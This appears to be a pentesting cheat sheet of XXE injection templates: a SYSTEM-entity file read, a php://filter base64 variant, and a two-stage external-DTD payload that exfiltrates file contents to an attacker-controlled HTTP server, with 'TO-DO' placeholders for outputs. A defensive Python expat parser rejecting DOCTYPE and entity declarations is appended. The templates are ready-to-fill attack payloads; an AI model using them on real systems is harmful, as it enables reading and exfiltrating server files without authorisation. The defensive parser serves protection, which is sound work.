XXE Template
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY data SYSTEM "<FILE>">]>
<<TAG>>
<<TAG1>>&data;</<TAG1>>
</<TAG>>
Sample Output:
TO-DO
XXE Template (With PHP Filter)
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY data SYSTEM "php://filter/convert.base64-encode/resource=<FILE>">]>
<<TAG>>
<<TAG1>>&data;</<TAG1>>
</<TAG>>
Sample Output:
TO-DO
External DTD (2 Stage)
1. Create an evil.dtd
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=<FILE>">
<!ENTITY % eval "<!ENTITY exfil SYSTEM 'http://<LOCAL_IP>:<PORT>/data?%data;'>">
Sample Output:
TO-DO
2. Host a Server
python3 -m http.server <PORT>
Sample Output:
TO-DO
3. XXE
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % bar SYSTEM "http://<LOCAL_IP>:<PORT>/evil.dtd">
%bar;
%eval;
]>
<<TAG>>
<<TAG1>>&exfil;</<TAG1>>
</<TAG>>
Sample Output:
TO-DO
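As an added, defender-side example that is not part of this cheat sheet: a Python parser built on the standard library's expat bindings that refuses every template above before any entity can be declared, read or fetched. The tag names root/item and the placeholder file path in the constructed sample are assumptions, as is the name parse_untrusted_xml.

```python
import xml.parsers.expat as expat

class UnsafeXmlError(ValueError):
    """Untrusted XML carried a DOCTYPE, entity declaration or external reference."""

def parse_untrusted_xml(data: bytes) -> dict[str, str]:
    """Parse untrusted XML into {tag: text}; any DOCTYPE aborts the parse.
    Refusing the DTD defeats all three templates above: the SYSTEM entity, the
    php://filter variant and the %bar;/%eval; two-stage one are never declared."""
    parser = expat.ParserCreate()
    # Never expand parameter entities, so an external DTD is never loaded.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXmlError(f"DOCTYPE '{name}' is not allowed in untrusted input")
    def reject_entity(name, is_param, value, base, sysid, pubid, notation):
        raise UnsafeXmlError(f"entity declaration '{name}' is not allowed")
    def reject_external(context, base, sysid, pubid):
        raise UnsafeXmlError(f"external entity reference to {sysid!r} blocked")
    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity           # defence in depth
    parser.ExternalEntityRefHandler = reject_external  # defence in depth

    result: dict[str, str] = {}   # tag -> accumulated text
    stack: list[str] = []         # currently open elements
    def start(tag, attrs):
        stack.append(tag)
        result.setdefault(tag, "")
    def chars(text):
        if stack:
            result[stack[-1]] += text
    parser.StartElementHandler = start
    parser.EndElementHandler = lambda tag: stack.pop()
    parser.CharacterDataHandler = chars
    parser.Parse(data, True)
    return {tag: text.strip() for tag, text in result.items()}

def is_rejected(data: bytes) -> bool:
    try:
        parse_untrusted_xml(data)
    except UnsafeXmlError:
        return True
    return False

# Constructed samples: the first template above with <TAG>=root, <TAG1>=item and
# <FILE> left as an obvious placeholder, plus a benign document for contrast.
XXE_SAMPLE = (b'<?xml version="1.0" encoding="UTF-8"?>\n'
              b'<!DOCTYPE foo [<!ENTITY data SYSTEM "file:///PLACEHOLDER_FILE">]>\n'
              b'<root><item>&data;</item></root>')
BENIGN_SAMPLE = b'<?xml version="1.0"?><root><item>hello</item></root>'
```

The DOCTYPE handler fires before expat reaches the entity declaration, so the rejection happens on the first line of the DTD regardless of which variant follows.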